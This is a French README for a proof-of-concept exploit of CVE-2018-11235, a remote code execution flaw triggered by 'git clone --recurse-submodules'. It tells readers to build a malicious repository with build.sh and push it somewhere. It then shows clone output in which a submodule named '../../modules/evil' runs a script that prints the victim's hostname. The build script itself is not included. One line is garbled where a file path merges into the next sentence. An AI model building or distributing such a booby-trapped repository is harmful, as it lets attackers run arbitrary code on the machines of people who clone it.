
Exploit PoC pour CVE-2018-11235 permettant une RCE sur git clone --recurse-submodules
GitHub ne m'autorise pas à pusher un dépôt exploitant la vulnérabilité (bien joué de leur part), vous devrez donc le construire vous-même en exécutant le script build.sh.
Ensuite, pushez le dépôt quelque part. Lorsque vous le clonez avec le
drapeau --recurse-submodules, le script malveillant est exécuté :
$ git clone --recurse-submodules repo dest_dir
Cloning into 'dest_dir'...
done.
Submodule 'Spoon-Knife' (https://github.com/octocat/Spoon-Knife) registered for path 'Spoon-Knife'
Submodule '../../modules/evil' (https://github.com/octocat/Spoon-Knife) registered for path 'evil'
Cloning into '/snip/dest_dir/Spoon-Knife'...
Submodule path 'Spoon-Knife': checked out 'd0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9'
Here is your hostname: snip
Submodule path 'evil': checked out 'd0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9'
Code dérivé du correctif git de @peff (cherchez le fichier de test ).
t/t7415-submodule-names.shÀ ce titre, ce dépôt est publié sous licence GNU General Public License version 2.
Correctif supplémentaire pour les versions plus anciennes de git gracieuseté de @atorralba (détails dans cet article).